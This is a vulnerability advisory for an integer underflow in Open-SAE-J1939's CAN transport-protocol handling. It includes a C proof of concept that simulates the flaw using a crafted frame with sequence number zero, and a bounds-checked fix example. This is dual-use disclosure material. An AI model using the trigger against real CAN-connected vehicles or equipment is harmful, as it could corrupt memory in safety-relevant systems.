Security Vulnerability Report
CVE-2026-37537 CVSS 8.1 HIGH

Published: 2026-05-01 17:16:24
Last Modified: 2026-05-07 15:53:50

Description

collin80/Open-SAE-J1939 thru commit 744024d4306bc387857dfce439558336806acb06 (2023-03-08) contains an integer underflow leading to out-of-bounds write in Transport Protocol Data Transfer handling. At line 23: uint8_t index = data[0] - 1. When data[0] (sequence number from CAN frame) is 0, index underflows to 255. Subsequent write at tp_dt->data[255*7 + i-1] reaches offset 1791, exceeding the MAX_TP_DT buffer (1785 bytes) by 6 bytes.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

collin80/Open-SAE-J1939 <= commit 744024d4306bc387857dfce439558336806acb06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

#define MAX_TP_DT 1785

// Simulated structure based on the vulnerability description
struct TP_DT {
    uint8_t data[MAX_TP_DT];
};

// Function simulating the vulnerable logic
void vulnerable_transport_protocol_handling(uint8_t *can_frame_data) {
    struct TP_DT *tp_dt = (struct TP_DT *)malloc(sizeof(struct TP_DT));
    if (!tp_dt) return;

    // VULNERABLE LINE: Integer underflow occurs here if data[0] is 0
    // uint8_t index = data[0] - 1;
    uint8_t index = can_frame_data[0] - 1;

    printf("[DEBUG] Calculated index: %d\n", index);

    // Simulating the loop that writes data
    for (int i = 1; i < 8; i++) {
        // Calculate offset: index * 7 + i - 1
        // If index is 255 (due to underflow), offset starts at 255*7 = 1785
        int offset = index * 7 + i - 1;

        printf("[DEBUG] Attempting write to offset: %d\n", offset);

        if (offset >= MAX_TP_DT) {
            printf("[!!!] OUT-OF-BOUNDS WRITE DETECTED at offset %d (Buffer size: %d)!\n", offset, MAX_TP_DT);
            // In a real scenario, this corrupts memory
        } else {
            tp_dt->data[offset] = can_frame_data[i];
        }
    }

    free(tp_dt);
}

int main() {
    // Malicious CAN frame payload
    // data[0] is the sequence number. Setting it to 0 triggers the underflow.
    uint8_t malicious_frame[8] = {0x00, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47};

    printf("--- CVE-2026-37537 PoC Trigger ---\n");
    printf("Sending frame with sequence number 0...\n");

    vulnerable_transport_protocol_handling(malicious_frame);

    printf("--- Exploit Attempt Finished ---\n");
    return 0;
}
```
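A bounds-checked form of the sequence-number handling the description covers, as an added example (not code from Open-SAE-J1939 or from this report). The struct, the function name `tp_dt_store_checked`, the status codes and the `total_size` field are assumptions for illustration; only `MAX_TP_DT` and the 7-byte stride come from the description.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_TP_DT 1785      /* buffer size stated in the description (255 * 7) */
#define TP_DT_PAYLOAD 7     /* data bytes per frame after the sequence byte */

/* Hypothetical receive buffer; not the project's own struct layout. */
struct tp_dt_buf {
    uint8_t data[MAX_TP_DT];
    uint16_t total_size;    /* assumed: message size announced before the transfer */
};

enum tp_dt_status { TP_DT_OK = 0, TP_DT_BAD_SEQ = -1, TP_DT_OUT_OF_RANGE = -2 };

/* Copy one 8-byte data-transfer frame into buf, rejecting anything that would
 * land outside the buffer or beyond the announced message size. */
int tp_dt_store_checked(struct tp_dt_buf *buf, const uint8_t frame[8])
{
    uint8_t seq = frame[0];
    if (seq == 0)           /* 0 - 1 would wrap to 255 in a uint8_t index */
        return TP_DT_BAD_SEQ;

    size_t limit = buf->total_size;
    if (limit > MAX_TP_DT)  /* never trust the announced size past the buffer */
        limit = MAX_TP_DT;

    /* Offset is computed in size_t from a value known to be >= 1, so no wrap. */
    size_t offset = (size_t)(seq - 1) * TP_DT_PAYLOAD;
    if (offset >= limit)
        return TP_DT_OUT_OF_RANGE;

    size_t n = limit - offset;  /* the last frame may carry fewer than 7 bytes */
    if (n > TP_DT_PAYLOAD)
        n = TP_DT_PAYLOAD;
    memcpy(&buf->data[offset], &frame[1], n);
    return TP_DT_OK;
}

int main(void)
{
    struct tp_dt_buf buf = { .total_size = 20 };
    /* Constructed frame: sequence number 0, as in the description. */
    const uint8_t zero_seq[8] = {0x00, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47};
    return tp_dt_store_checked(&buf, zero_seq) == TP_DT_BAD_SEQ ? 0 : 1;
}
```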

References

https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381
https://github.com/DanielMartensson/Open-SAE-J1939
https://github.com/collin80/Open-SAE-J1939

Additional Details

Weakness: CWE-190
Status: Awaiting Analysis
Exploitability Score: 2.8
Impact Score: 5.2